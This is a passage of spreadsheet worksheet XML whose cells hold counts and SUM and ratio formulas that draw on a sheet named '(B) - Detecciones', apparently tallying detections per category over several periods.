      <c r="AI10" s="168">
        <f t="shared" si="1"/>
        <v>19.83333333</v>
      </c>
      <c r="AJ10" s="165"/>
      <c r="AK10" s="165"/>
      <c r="AL10" s="165"/>
      <c r="AM10" s="165"/>
      <c r="AN10" s="165"/>
      <c r="AO10" s="165"/>
      <c r="AP10" s="165"/>
      <c r="AQ10" s="165"/>
      <c r="AR10" s="165"/>
      <c r="AS10" s="165"/>
    </row>
    <row r="11">
      <c r="C11" s="163"/>
      <c r="D11" s="163"/>
      <c r="E11" s="163"/>
      <c r="F11" s="163"/>
      <c r="G11" s="163"/>
      <c r="H11" s="163"/>
      <c r="I11" s="163"/>
      <c r="J11" s="164" t="s">
        <v>107</v>
      </c>
      <c r="K11" s="165">
        <v>0.0</v>
      </c>
      <c r="L11" s="165">
        <v>0.0</v>
      </c>
      <c r="M11" s="165">
        <v>0.0</v>
      </c>
      <c r="N11" s="165">
        <v>0.0</v>
      </c>
      <c r="O11" s="166">
        <v>2.0</v>
      </c>
      <c r="Q11" s="164" t="s">
        <v>107</v>
      </c>
      <c r="R11" s="165">
        <v>0.0</v>
      </c>
      <c r="S11" s="165">
        <v>0.0</v>
      </c>
      <c r="T11" s="165">
        <v>0.0</v>
      </c>
      <c r="U11" s="165">
        <v>0.0</v>
      </c>
      <c r="V11" s="166">
        <v>2.0</v>
      </c>
      <c r="X11" s="164" t="s">
        <v>107</v>
      </c>
      <c r="Y11" s="165">
        <v>44.0</v>
      </c>
      <c r="Z11" s="165">
        <v>59.0</v>
      </c>
      <c r="AA11" s="165">
        <v>65.0</v>
      </c>
      <c r="AB11" s="165">
        <v>80.0</v>
      </c>
      <c r="AC11" s="166">
        <v>80.0</v>
      </c>
      <c r="AD11" s="165"/>
      <c r="AE11" s="164" t="s">
        <v>107</v>
      </c>
      <c r="AF11" s="167">
        <f t="shared" ref="AF11:AI11" si="2">Y11/$V11</f>
        <v>22</v>
      </c>
      <c r="AG11" s="167">
        <f t="shared" si="2"/>
        <v>29.5</v>
      </c>
      <c r="AH11" s="167">
        <f t="shared" si="2"/>
        <v>32.5</v>
      </c>
      <c r="AI11" s="168">
        <f t="shared" si="2"/>
        <v>40</v>
      </c>
      <c r="AJ11" s="165"/>
      <c r="AK11" s="165"/>
      <c r="AL11" s="165"/>
      <c r="AM11" s="165"/>
      <c r="AN11" s="165"/>
      <c r="AO11" s="165"/>
      <c r="AP11" s="165"/>
      <c r="AQ11" s="165"/>
      <c r="AR11" s="165"/>
      <c r="AS11" s="165"/>
    </row>
    <row r="12">
      <c r="C12" s="163"/>
      <c r="D12" s="163"/>
      <c r="E12" s="163"/>
      <c r="F12" s="163"/>
      <c r="G12" s="163"/>
      <c r="H12" s="163"/>
      <c r="I12" s="163"/>
      <c r="J12" s="164" t="s">
        <v>153</v>
      </c>
      <c r="K12" s="165">
        <v>1.0</v>
      </c>
      <c r="L12" s="165">
        <v>1.0</v>
      </c>
      <c r="M12" s="165">
        <v>2.0</v>
      </c>
      <c r="N12" s="165">
        <v>2.0</v>
      </c>
      <c r="O12" s="166">
        <v>7.0</v>
      </c>
      <c r="Q12" s="164" t="s">
        <v>153</v>
      </c>
      <c r="R12" s="165">
        <v>1.0</v>
      </c>
      <c r="S12" s="165">
        <v>1.0</v>
      </c>
      <c r="T12" s="165">
        <v>2.0</v>
      </c>
      <c r="U12" s="165">
        <v>3.0</v>
      </c>
      <c r="V12" s="166">
        <v>12.0</v>
      </c>
      <c r="X12" s="164" t="s">
        <v>153</v>
      </c>
      <c r="Y12" s="165">
        <f>SUM('(B) - Detecciones'!L15:L26)</f>
        <v>6</v>
      </c>
      <c r="Z12" s="165">
        <f>SUM('(B) - Detecciones'!P15:P26)</f>
        <v>13</v>
      </c>
      <c r="AA12" s="165">
        <f>SUM('(B) - Detecciones'!T15:T26)</f>
        <v>21</v>
      </c>
      <c r="AB12" s="165">
        <f>SUM('(B) - Detecciones'!X15:X26)</f>
        <v>59</v>
      </c>
      <c r="AC12" s="166">
        <v>59.0</v>
      </c>
      <c r="AD12" s="165"/>
      <c r="AE12" s="164" t="s">
        <v>153</v>
      </c>
      <c r="AF12" s="167">
        <f t="shared" ref="AF12:AI12" si="3">Y12/$V12</f>
        <v>0.5</v>
      </c>
      <c r="AG12" s="167">
        <f t="shared" si="3"/>
        <v>1.083333333</v>
      </c>
      <c r="AH12" s="167">
        <f t="shared" si="3"/>
        <v>1.75</v>
      </c>
      <c r="AI12" s="168">
        <f t="shared" si="3"/>
        <v>4.916666667</v>
      </c>
      <c r="AJ12" s="165"/>
      <c r="AK12" s="165"/>
      <c r="AL12" s="165"/>
      <c r="AM12" s="165"/>
      <c r="AN12" s="165"/>
      <c r="AO12" s="165"/>
      <c r="AP12" s="165"/>
      <c r="AQ12" s="165"/>
      <c r="AR12" s="165"/>
      <c r="AS12" s="165"/>
    </row>
    <row r="13">
      <c r="C13" s="163"/>
      <c r="D13" s="163"/>
      <c r="E13" s="163"/>
      <c r="F13" s="163"/>
      <c r="G13" s="163"/>
      <c r="H13" s="163"/>
      <c r="I13" s="163"/>
      <c r="J13" s="164" t="s">
        <v>154</v>
      </c>
      <c r="K13" s="165">
        <v>0.0</v>
      </c>
      <c r="L13" s="165">
        <v>1.0</v>
      </c>
      <c r="M13" s="165">
        <v>1.0</v>
      </c>
      <c r="N13" s="165">
        <v>1.0</v>
      </c>
      <c r="O13" s="166">
        <v>6.0</v>
      </c>
      <c r="Q13" s="164" t="s">
        <v>154</v>
      </c>
      <c r="R13" s="165">
        <v>0.0</v>
      </c>
      <c r="S13" s="165">
        <v>1.0</v>
      </c>
      <c r="T13" s="165">
        <v>3.0</v>
      </c>
      <c r="U13" s="165">
        <v>3.0</v>
      </c>
      <c r="V13" s="166">
        <v>7.0</v>
      </c>
      <c r="X13" s="164" t="s">
        <v>154</v>
      </c>
      <c r="Y13" s="165">
        <f>SUM('(B) - Detecciones'!L27:L31)+SUM('(B) - Detecciones'!L15)+SUM('(B) - Detecciones'!L95)</f>
        <v>1</v>
      </c>
      <c r="Z13" s="165">
        <f>SUM('(B) - Detecciones'!P27:P31)+SUM('(B) - Detecciones'!P15)+SUM('(B) - Detecciones'!P95)</f>
        <v>6</v>
      </c>
      <c r="AA13" s="165">
        <f>SUM('(B) - Detecciones'!T27:T31)+SUM('(B) - Detecciones'!T15)+SUM('(B) - Detecciones'!T95)</f>
        <v>14</v>
      </c>
      <c r="AB13" s="165">
        <f>SUM('(B) - Detecciones'!X27:X31)+SUM('(B) - Detecciones'!X15)+SUM('(B) - Detecciones'!X95)</f>
        <v>37</v>
      </c>
      <c r="AC13" s="166">
        <v>37.0</v>
      </c>
      <c r="AD13" s="165"/>
      <c r="AE13" s="164" t="s">
        <v>154</v>
      </c>
      <c r="AF13" s="167">
        <f t="shared" ref="AF13:AI13" si="4">Y13/$V13</f>
        <v>0.1428571429</v>
      </c>
      <c r="AG13" s="167">
        <f t="shared" si="4"/>
        <v>0.8571428571</v>
      </c>
      <c r="AH13" s="167">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="AI13" s="168">
        <f t="shared" si="4"/>
        <v>5.285714286</v>
      </c>
      <c r="AJ13" s="165"/>
      <c r="AK13" s="165"/>
      <c r="AL13" s="165"/>
      <c r="AM13" s="165"/>
      <c r="AN13" s="165"/>
      <c r="AO13" s="165"/>
      <c r="AP13" s="165"/>
      <c r="AQ13" s="165"/>
      <c r="AR13" s="165"/>
      <c r="AS13" s="165"/>
    </row>
    <row r="14">
      <c r="C14" s="163"/>
      <c r="D14" s="163"/>
      <c r="E14" s="163"/>
      <c r="F14" s="163"/>
      <c r="G14" s="163"/>
      <c r="H14" s="163"/>
      <c r="I14" s="163"/>
      <c r="J14" s="164" t="s">
        <v>288</v>
      </c>
      <c r="K14" s="165">
        <v>0.0</v>
      </c>
      <c r="L14" s="165">
        <v>0.0</v>
      </c>
      <c r="M14" s="165">
        <v>1.0</v>
      </c>
      <c r="N14" s="165">
        <v>2.0</v>
      </c>
      <c r="O14" s="166">
        <v>3.0</v>
      </c>
      <c r="Q14" s="164" t="s">
        <v>288</v>
      </c>
      <c r="R14" s="165">
        <v>0.0</v>
      </c>
      <c r="S14" s="165">
        <v>0.0</v>
      </c>
      <c r="T14" s="165">
        <v>1.0</v>
      </c>
      <c r="U14" s="165">
        <v>2.0</v>
      </c>
      <c r="V14" s="166">
        <v>10.0</v>
      </c>
      <c r="X14" s="164" t="s">
        <v>288</v>
      </c>
      <c r="Y14" s="165">
        <v>0.0</v>
      </c>
      <c r="Z14" s="165">
        <v>5.0</v>
      </c>
      <c r="AA14" s="165">
        <v>9.0</v>
      </c>
      <c r="AB14" s="165">
        <v>43.0</v>
      </c>
      <c r="AC14" s="166">
        <v>43.0</v>
      </c>
      <c r="AD14" s="165"/>
      <c r="AE14" s="164" t="s">
        <v>288</v>
      </c>
      <c r="AF14" s="167">
        <f t="shared" ref="AF14:AI14" si="5">Y14/$V14</f>
        <v>0</v>
      </c>
      <c r="AG14" s="167">
        <f t="shared" si="5"/>
        <v>0.5</v>
      </c>
      <c r="AH14" s="167">
        <f t="shared" si="5"/>
        <v>0.9</v>
      </c>
      <c r="AI14" s="168">
        <f t="shared" si="5"/>
        <v>4.3</v>
      </c>
      <c r="AJ14" s="165"/>
      <c r="AK14" s="165"/>
      <c r="AL14" s="165"/>
      <c r="AM14" s="165"/>
      <c r="AN14" s="165"/>
      <c r="AO14" s="165"/>
      <c r="AP14" s="165"/>
      <c r="AQ14" s="165"/>
      <c r="AR14" s="165"/>
      <c r="AS14" s="165"/>
    </row>
    <row r="15">
      <c r="C15" s="163"/>
      <c r="D15" s="163"/>
      <c r="E15" s="163"/>
      <c r="F15" s="163"/>
      <c r="G15" s="163"/>
      <c r="H15" s="163"/>
      <c r="I15" s="163"/>
      <c r="J15" s="164" t="s">
        <v>337</v>
      </c>
      <c r="K15" s="165">
        <v>1.0</v>
      </c>
      <c r="L15" s="165">
        <v>1.0</v>
      </c>
      <c r="M15" s="165">
        <v>2.0</v>
      </c>
      <c r="N15" s="165">
        <v>3.0</v>
      </c>
      <c r="O15" s="166">
        <v>5.0</v>
      </c>
      <c r="Q15" s="164" t="s">
        <v>337</v>
      </c>
      <c r="R15" s="165">
        <v>1.0</v>
      </c>
      <c r="S15" s="165">
        <v>1.0</v>
      </c>
      <c r="T15" s="165">
        <v>2.0</v>
      </c>
      <c r="U15" s="165">
        <v>3.0</v>
      </c>
      <c r="V15" s="166">
        <v>11.0</v>
      </c>
      <c r="X15" s="164" t="s">
        <v>337</v>
      </c>
      <c r="Y15" s="165">
        <f>SUM('(B) - Detecciones'!L52:L55)+SUM('(B) - Detecciones'!L43:L49)</f>
        <v>2</v>
      </c>
      <c r="Z15" s="165">
        <f>SUM('(B) - Detecciones'!P52:P55)+SUM('(B) - Detecciones'!P43:P49)</f>
        <v>7</v>
      </c>
      <c r="AA15" s="165">
        <f>SUM('(B) - Detecciones'!T52:T55)+SUM('(B) - Detecciones'!T43:T49)</f>
        <v>9</v>
      </c>
      <c r="AB15" s="165">
        <f>SUM('(B) - Detecciones'!X52:X55)+SUM('(B) - Detecciones'!X43:X49)</f>
        <v>48</v>
      </c>
      <c r="AC15" s="166">
        <v>48.0</v>
      </c>
      <c r="AD15" s="165"/>
      <c r="AE15" s="164" t="s">
        <v>337</v>
      </c>
      <c r="AF15" s="167">
        <f t="shared" ref="AF15:AI15" si="6">Y15/$V15</f>
        <v>0.1818181818</v>
      </c>
      <c r="AG15" s="167">
        <f t="shared" si="6"/>
        <v>0.6363636364</v>
      </c>
      <c r="AH15" s="167">
        <f t="shared" si="6"/>
        <v>0.8181818182</v>
      </c>
      <c r="AI15" s="168">
        <f t="shared" si="6"/>
        <v>4.363636364</v>
      </c>
      <c r="AJ15" s="165"/>
      <c r="AK15" s="165"/>
      <c r="AL15" s="165"/>
      <c r="AM15" s="165"/>
      <c r="AN15" s="165"/>
      <c r="AO15" s="165"/>
      <c r="AP15" s="165"/>
      <c r="AQ15" s="165"/>
      <c r="AR15" s="165"/>
      <c r="AS15" s="165"/>
    </row>
    <row r="16">
      <c r="C16" s="163"/>
      <c r="D16" s="163"/>
      <c r="E16" s="163"/>
      <c r="F16" s="163"/>
      <c r="G16" s="163"/>
      <c r="H16" s="163"/>
      <c r="I16" s="163"/>
      <c r="J16" s="164" t="s">
        <v>427</v>
      </c>
      <c r="K16" s="165">
        <v>0.0</v>
      </c>
      <c r="L16" s="165">
        <v>2.0</v>
      </c>
      <c r="M16" s="165">
        <v>2.0</v>
      </c>
      <c r="N16" s="165">
        <v>3.0</v>
      </c>
      <c r="O16" s="166">
        <v>5.0</v>
      </c>
      <c r="Q16" s="164" t="s">
        <v>427</v>
      </c>
      <c r="R16" s="165">
        <v>0.0</v>
      </c>
      <c r="S16" s="165">
        <v>2.0</v>
      </c>
      <c r="T16" s="165">
        <v>3.0</v>
      </c>
      <c r="U16" s="165">
        <v>4.0</v>
      </c>
      <c r="V16" s="166">
        <v>23.0</v>
      </c>
      <c r="X16" s="164" t="s">
        <v>427</v>
      </c>
      <c r="Y16" s="165">
        <f>SUM('(B) - Detecciones'!L56:L79)</f>
        <v>6</v>
      </c>
      <c r="Z16" s="165">
        <f>SUM('(B) - Detecciones'!P56:P79)</f>
        <v>12</v>
      </c>
      <c r="AA16" s="165">
        <f>SUM('(B) - Detecciones'!T56:T79)</f>
        <v>15</v>
      </c>
      <c r="AB16" s="165">
        <f>SUM('(B) - Detecciones'!X56:X79)</f>
        <v>83</v>
      </c>
      <c r="AC16" s="166">
        <v>83.0</v>
      </c>
      <c r="AD16" s="165"/>
      <c r="AE16" s="164" t="s">
        <v>427</v>
      </c>
      <c r="AF16" s="167">
        <f t="shared" ref="AF16:AI16" si="7">Y16/$V16</f>
        <v>0.2608695652</v>
      </c>
      <c r="AG16" s="167">
        <f t="shared" si="7"/>
        <v>0.5217391304</v>
      </c>
      <c r="AH16" s="167">
        <f t="shared" si="7"/>
        <v>0.652173913</v>
      </c>
      <c r="AI16" s="168">
        <f t="shared" si="7"/>
        <v>3.608695652</v>
      </c>
      <c r="AJ16" s="165"/>
      <c r="AK16" s="165"/>
      <c r="AL16" s="165"/>
      <c r="AM16" s="165"/>
      <c r="AN16" s="165"/>
      <c r="AO16" s="165"/>
      <c r="AP16" s="165"/>
      <c r="AQ16" s="165"/>
      <c r="AR16" s="165"/>
      <c r="AS16" s="165"/>
    </row>
    <row r="17">
      <c r="C17" s="163"/>
      <c r="D17" s="163"/>
      <c r="E17" s="163"/>
      <c r="F17" s="163"/>
      <c r="G17" s="163"/>
      <c r="H17" s="163"/>
      <c r="I17" s="163"/>
      <c r="J17" s="164" t="s">
        <v>215</v>
      </c>
      <c r="K17" s="165">
        <v>0.0</v>
      </c>
      <c r="L17" s="165">
        <v>1.0</v>
      </c>
      <c r="M17" s="165">
        <v>2.0</v>
      </c>
      <c r="N17" s="165">
        <v>3.0</v>
      </c>
      <c r="O17" s="166">
        <v>16.0</v>
      </c>
      <c r="Q17" s="164" t="s">
        <v>215</v>
      </c>
      <c r="R17" s="165">
        <v>0.0</v>
      </c>
      <c r="S17" s="165">
        <v>1.0</v>
      </c>
      <c r="T17" s="165">
        <v>2.0</v>
      </c>
      <c r="U17" s="165">
        <v>3.0</v>
      </c>
      <c r="V17" s="166">
        <v>18.0</v>
      </c>
      <c r="X17" s="164" t="s">
        <v>215</v>
      </c>
      <c r="Y17" s="165">
        <f>SUM('(B) - Detecciones'!L80:L95)+SUM('(B) - Detecciones'!L24:L25)</f>
        <v>4</v>
      </c>
      <c r="Z17" s="165">
        <f>SUM('(B) - Detecciones'!P80:P95)+SUM('(B) - Detecciones'!P24:P25)</f>
        <v>15</v>
      </c>
      <c r="AA17" s="165">
        <f>SUM('(B) - Detecciones'!T80:T95)+SUM('(B) - Detecciones'!T24:T25)</f>
        <v>18</v>
      </c>
      <c r="AB17" s="165">
        <f>SUM('(B) - Detecciones'!X80:X95)+SUM('(B) - Detecciones'!X24:X25)</f>
        <v>66</v>
      </c>
      <c r="AC17" s="166">
        <v>66.0</v>
      </c>
      <c r="AD17" s="165"/>
      <c r="AE17" s="164" t="s">
        <v>215</v>
      </c>
      <c r="AF17" s="167">
        <f t="shared" ref="AF17:AI17" si="8">Y17/$V17</f>
        <v>0.2222222222</v>
      </c>
      <c r="AG17" s="167">
        <f t="shared" si="8"/>
        <v>0.8333333333</v>
      </c>
      <c r="AH17" s="167">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AI17" s="168">
        <f t="shared" si="8"/>
        <v>3.666666667</v>
      </c>
      <c r="AJ17" s="165"/>
      <c r="AK17" s="165"/>
      <c r="AL17" s="165"/>
      <c r="AM17" s="165"/>
      <c r="AN17" s="165"/>
      <c r="AO17" s="165"/>
      <c r="AP17" s="165"/>
      <c r="AQ17" s="165"/>
      <c r="AR17" s="165"/>
      <c r="AS17" s="165"/>
    </row>
    <row r="18">
      <c r="C18" s="163"/>
      <c r="D18" s="163"/>
      <c r="E18" s="163"/>
      <c r="F18" s="163"/>
      <c r="G18" s="163"/>
      <c r="H18" s="163"/>
      <c r="I18" s="163"/>
      <c r="J18" s="164" t="s">
        <v>247</v>
      </c>
      <c r="K18" s="165">
        <v>0.0</v>
      </c>
      <c r="L18" s="165">
        <v>0.0</v>
      </c>
      <c r="M18" s="165">
        <v>1.0</v>
      </c>
      <c r="N18" s="165">
        <v>1.0</v>
      </c>
      <c r="O18" s="166">
        <v>10.0</v>
      </c>
      <c r="Q18" s="164" t="s">
        <v>247</v>
      </c>
      <c r="R18" s="165">
        <v>0.0</v>
      </c>
      <c r="S18" s="165">
        <v>0.0</v>
      </c>
      <c r="T18" s="165">
        <v>1.0</v>
      </c>
      <c r="U18" s="165">
        <v>1.0</v>
      </c>
      <c r="V18" s="166">
        <v>11.0</v>
      </c>
      <c r="X18" s="164" t="s">
        <v>247</v>
      </c>
      <c r="Y18" s="165">
        <f>SUM('(B) - Detecciones'!L96:L103)+SUM('(B) - Detecciones'!L28:L29)+SUM('(B) - Detecciones'!L95)</f>
        <v>2</v>
      </c>
      <c r="Z18" s="165">
        <f>SUM('(B) - Detecciones'!P96:P103)+SUM('(B) - Detecciones'!P28:P29)+SUM('(B) - Detecciones'!P95)</f>
        <v>5</v>
      </c>
      <c r="AA18" s="165">
        <f>SUM('(B) - Detecciones'!T96:T103)+SUM('(B) - Detecciones'!T28:T29)+SUM('(B) - Detecciones'!T95)</f>
        <v>8</v>
      </c>
      <c r="AB18" s="165">
        <f>SUM('(B) - Detecciones'!X96:X103)+SUM('(B) - Detecciones'!X28:X29)+SUM('(B) - Detecciones'!X95)</f>
        <v>38</v>
      </c>
      <c r="AC18" s="166">
        <v>38.0</v>
      </c>
      <c r="AD18" s="165"/>
      <c r="AE18" s="164" t="s">
        <v>247</v>
      </c>
      <c r="AF18" s="167">
        <f t="shared" ref="AF18:AI18" si="9">Y18/$V18</f>
        <v>0.1818181818</v>
      </c>
      <c r="AG18" s="167">
        <f t="shared" si="9"/>
        <v>0.4545454545</v>
      </c>
      <c r="AH18" s="167">
        <f t="shared" si="9"/>
        <v>0.7272727273</v>
      </c>
      <c r="AI18" s="168">
        <f t="shared" si="9"/>
        <v>3.454545455</v>
      </c>
      <c r="AJ18" s="165"/>
      <c r="AK18" s="165"/>
      <c r="AL18" s="165"/>
      <c r="AM18" s="165"/>
      <c r="AN18" s="165"/>
      <c r="AO18" s="165"/>
      <c r="AP18" s="165"/>
      <c r="AQ18" s="165"/>
      <c r="AR18" s="165"/>
      <c r="AS18" s="165"/>
    </row>
    <row r="19">
      <c r="C19" s="163"/>
      <c r="D19" s="163"/>
      <c r="E19" s="163"/>
      <c r="F19" s="163"/>
      <c r="G19" s="163"/>
      <c r="H19" s="163"/>
      <c r="I19" s="163"/>
      <c r="J19" s="164" t="s">
        <v>756</v>
      </c>
      <c r="K19" s="165">
        <v>2.0</v>
      </c>
      <c r="L19" s="165">
        <v>2.0</v>
      </c>
      <c r="M19" s="165">
        <v>2.0</v>
      </c>
      <c r="N19" s="165">
        <v>2.0</v>
      </c>
      <c r="O19" s="166">
        <v>4.0</v>
      </c>
      <c r="Q19" s="164" t="s">
        <v>756</v>
      </c>
      <c r="R19" s="165">
        <v>2.0</v>
      </c>
      <c r="S19" s="165">
        <v>2.0</v>
      </c>
      <c r="T19" s="165">
        <v>3.0</v>
      </c>
      <c r="U19" s="165">
        <v>3.0</v>
      </c>
      <c r="V19" s="166">
        <v>6.0</v>
      </c>
      <c r="X19" s="164" t="s">
        <v>756</v>
      </c>
      <c r="Y19" s="165">
        <f>SUM('(B) - Detecciones'!L104:L109)</f>
        <v>2</v>
      </c>
      <c r="Z19" s="165">
        <f>SUM('(B) - Detecciones'!P104:P109)</f>
        <v>6</v>
      </c>
      <c r="AA19" s="165">
        <f>SUM('(B) - Detecciones'!T104:T109)</f>
        <v>14</v>
      </c>
      <c r="AB19" s="165">
        <f>SUM('(B) - Detecciones'!X104:X109)</f>
        <v>32</v>
      </c>
      <c r="AC19" s="166">
        <v>32.0</v>
      </c>
      <c r="AD19" s="165"/>
      <c r="AE19" s="164" t="s">
        <v>756</v>
      </c>
      <c r="AF19" s="167">
        <f t="shared" ref="AF19:AI19" si="10">Y19/$V19</f>
        <v>0.3333333333</v>
      </c>
      <c r="AG19" s="167">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AH19" s="167">
        <f t="shared" si="10"/>
        <v>2.333333333</v>
      </c>
      <c r="AI19" s="168">
        <f t="shared" si="10"/>
        <v>5.333333333</v>
      </c>
      <c r="AJ19" s="165"/>
      <c r="AK19" s="165"/>
      <c r="AL19" s="165"/>
      <c r="AM19" s="165"/>
      <c r="AN19" s="165"/>
      <c r="AO19" s="165"/>
      <c r="AP19" s="165"/>
      <c r="AQ19" s="165"/>
      <c r="AR19" s="165"/>
      <c r="AS19" s="165"/>
    </row>
    <row r="20">
      <c r="C20" s="163"/>
      <c r="D20" s="163"/>
      <c r="E20" s="163"/>
      <c r="F20" s="163"/>
      <c r="G20" s="163"/>
      <c r="H20" s="163"/>
      <c r="I20" s="163"/>
      <c r="J20" s="164" t="s">
        <v>321</v>
      </c>
      <c r="K20" s="165">
        <v>1.0</v>
      </c>
      <c r="L20" s="165">
        <v>1.0</v>
      </c>
      <c r="M20" s="165">
        <v>1.0</v>
      </c>
      <c r="N20" s="165">
        <v>1.0</v>
      </c>
      <c r="O20" s="166">
        <v>5.0</v>
      </c>
      <c r="Q20" s="164" t="s">
        <v>321</v>
      </c>
      <c r="R20" s="165">
        <v>1.0</v>
      </c>
      <c r="S20" s="165">
        <v>2.0</v>
      </c>
      <c r="T20" s="165">
        <v>2.0</v>
      </c>
      <c r="U20" s="165">
        <v>2.0</v>
      </c>
      <c r="V20" s="166">
        <v>11.0</v>
      </c>
      <c r="X20" s="164" t="s">
        <v>321</v>
      </c>
      <c r="Y20" s="165">
        <f>SUM('(B) - Detecciones'!L110:L116)+SUM('(B) - Detecciones'!L39:L42)</f>
        <v>9</v>
      </c>
      <c r="Z20" s="165">
        <f>SUM('(B) - Detecciones'!P110:P116)+SUM('(B) - Detecciones'!P39:P42)</f>
        <v>140</v>
      </c>
      <c r="AA20" s="165">
        <f>SUM('(B) - Detecciones'!T110:T116)+SUM('(B) - Detecciones'!T39:T42)</f>
        <v>148</v>
      </c>
      <c r="AB20" s="165">
        <f>SUM('(B) - Detecciones'!X110:X116)+SUM('(B) - Detecciones'!X39:X42)</f>
        <v>391</v>
      </c>
      <c r="AC20" s="166">
        <v>391.0</v>
      </c>
      <c r="AD20" s="165"/>
      <c r="AE20" s="164" t="s">
        <v>321</v>
      </c>
      <c r="AF20" s="167">
        <f t="shared" ref="AF20:AI20" si="11">Y20/$V20</f>
        <v>0.8181818182</v>
      </c>
      <c r="AG20" s="167">
        <f t="shared" si="11"/>
        <v>12.72727273</v>
      </c>
      <c r="AH20" s="167">
        <f t="shared" si="11"/>
        <v>13.45454545</v>
      </c>
      <c r="AI20" s="168">
        <f t="shared" si="11"/>
        <v>35.54545455</v>
      </c>
      <c r="AJ20" s="165"/>
      <c r="AK20" s="165"/>
      <c r="AL20" s="165"/>
      <c r="AM20" s="165"/>
      <c r="AN20" s="165"/>
      <c r="AO20" s="165"/>
      <c r="AP20" s="165"/>
      <c r="AQ20" s="165"/>
      <c r="AR20" s="165"/>
      <c r="AS20" s="165"/>
    </row>
    <row r="21">
      <c r="C21" s="163"/>
      <c r="D21" s="163"/>
      <c r="E21" s="163"/>
      <c r="F21" s="163"/>
      <c r="G21" s="163"/>
      <c r="H21" s="163"/>
      <c r="I21" s="163"/>
      <c r="J21" s="164" t="s">
        <v>843</v>
      </c>
      <c r="K21" s="165">
        <v>1.0</v>
      </c>
      <c r="L21" s="165">
        <v>1.0</v>
      </c>
      <c r="M21" s="165">
        <v>1.0</v>
      </c>
      <c r="N21" s="165">
        <v>1.0</v>
      </c>
      <c r="O21" s="166">
        <v>8.0</v>
      </c>
      <c r="Q21" s="164" t="s">
        <v>843</v>
      </c>
      <c r="R21" s="165">
        <v>1.0</v>
      </c>
      <c r="S21" s="165">
        <v>1.0</v>
      </c>
      <c r="T21" s="165">
        <v>1.0</v>
      </c>
      <c r="U21" s="165">
        <v>2.0</v>
      </c>
      <c r="V21" s="166">
        <v>8.0</v>
      </c>
      <c r="X21" s="164" t="s">
        <v>843</v>
      </c>
      <c r="Y21" s="165">
        <f>SUM('(B) - Detecciones'!L117:L125)</f>
        <v>3</v>
      </c>
      <c r="Z21" s="165">
        <f>SUM('(B) - Detecciones'!P117:P125)</f>
        <v>10</v>
      </c>
      <c r="AA21" s="165">
        <f>SUM('(B) - Detecciones'!T117:T125)</f>
        <v>13</v>
      </c>
      <c r="AB21" s="165">
        <f>SUM('(B) - Detecciones'!X117:X125)</f>
        <v>35</v>
      </c>
      <c r="AC21" s="166">
        <v>35.0</v>
      </c>
      <c r="AD21" s="165"/>
      <c r="AE21" s="164" t="s">
        <v>843</v>
      </c>
      <c r="AF21" s="167">
        <f t="shared" ref="AF21:AI21" si="12">Y21/$V21</f>
        <v>0.375</v>
      </c>
      <c r="AG21" s="167">
        <f t="shared" si="12"/>
        <v>1.25</v>
      </c>
      <c r="AH21" s="167">
        <f t="shared" si="12"/>
        <v>1.625</v>
      </c>
      <c r="AI21" s="168">
        <f t="shared" si="12"/>
        <v>4.375</v>
      </c>
      <c r="AJ21" s="165"/>
      <c r="AK21" s="165"/>
      <c r="AL21" s="165"/>
      <c r="AM21" s="165"/>
      <c r="AN21" s="165"/>
      <c r="AO21" s="165"/>
      <c r="AP21" s="165"/>
      <c r="AQ21" s="165"/>
      <c r="AR21" s="165"/>
      <c r="AS21" s="165"/>
    </row>
    <row r="22">
      <c r="C22" s="163"/>
      <c r="D22" s="163"/>
      <c r="E22" s="163"/>
      <c r="F22" s="163"/>
      <c r="G22" s="163"/>
      <c r="H22" s="163"/>
      <c r="I22" s="163"/>
      <c r="J22" s="169" t="s">
        <v>915</v>
      </c>
      <c r="K22" s="170">
        <v>1.0</v>
      </c>
      <c r="L22" s="170">
        <v>2.0</v>
      </c>
      <c r="M22" s="170">
        <v>2.0</v>
      </c>
      <c r="N22" s="170">
        <v>2.0</v>
      </c>
      <c r="O22" s="171">
        <v>4.0</v>
      </c>
      <c r="Q22" s="169" t="s">
        <v>915</v>
      </c>
      <c r="R22" s="170">
        <v>1.0</v>
      </c>
      <c r="S22" s="170">
        <v>2.0</v>
      </c>
      <c r="T22" s="170">
        <v>2.0</v>
      </c>
      <c r="U22" s="170">
        <v>2.0</v>
      </c>
      <c r="V22" s="171">
        <v>4.0</v>
      </c>
      <c r="X22" s="169" t="s">
        <v>915</v>
      </c>
      <c r="Y22" s="170">
        <f>SUM('(B) - Detecciones'!L126:L129)</f>
        <v>2</v>
      </c>
      <c r="Z22" s="170">
        <f>SUM('(B) - Detecciones'!P126:P129)</f>
        <v>6</v>
      </c>
      <c r="AA22" s="170">
        <f>SUM('(B) - Detecciones'!T126:T129)</f>
        <v>10</v>
      </c>
      <c r="AB22" s="170">
        <f>SUM('(B) - Detecciones'!X126:X129)</f>
        <v>23</v>
      </c>
      <c r="AC22" s="171">
        <v>23.0</v>
      </c>
      <c r="AD22" s="165"/>
      <c r="AE22" s="169" t="s">
        <v>915</v>
      </c>
      <c r="AF22" s="172">
        <f t="shared" ref="AF22:AI22" si="13">Y22/$V22</f>
        <v>0.5</v>
      </c>
      <c r="AG22" s="172">
        <f t="shared" si="13"/>
        <v>1.5</v>
      </c>
      <c r="AH22" s="172">
        <f t="shared" si="13"/>
        <v>2.5</v>
      </c>
      <c r="AI22" s="173">
        <f t="shared" si="13"/>
        <v>5.75</v>
      </c>
      <c r="AJ22" s="165"/>
      <c r="AK22" s="165"/>
      <c r="AL22" s="165"/>
      <c r="AM22" s="165"/>
      <c r="AN22" s="165"/>
      <c r="AO22" s="165"/>
      <c r="AP22" s="165"/>
      <c r="AQ22" s="165"/>
      <c r="AR22" s="165"/>
      <c r="AS22" s="165"/>
    </row>
    <row r="23">
      <c r="C23" s="174"/>
      <c r="D23" s="174"/>
      <c r="E23" s="174"/>
      <c r="F23" s="174"/>
      <c r="G23" s="174"/>
      <c r="H23" s="174"/>
      <c r="I23" s="174"/>
      <c r="J23" s="174"/>
      <c r="K23" s="174"/>
      <c r="L23" s="174"/>
      <c r="M23" s="174"/>
      <c r="N23" s="174"/>
      <c r="O23" s="174"/>
    </row>
    <row r="24">
      <c r="C24" s="174"/>
      <c r="D24" s="174"/>
      <c r="E24" s="174"/>
      <c r="F24" s="174"/>
      <c r="G24" s="174"/>
      <c r="H24" s="174"/>
      <c r="I24" s="174"/>
      <c r="J24" s="174"/>
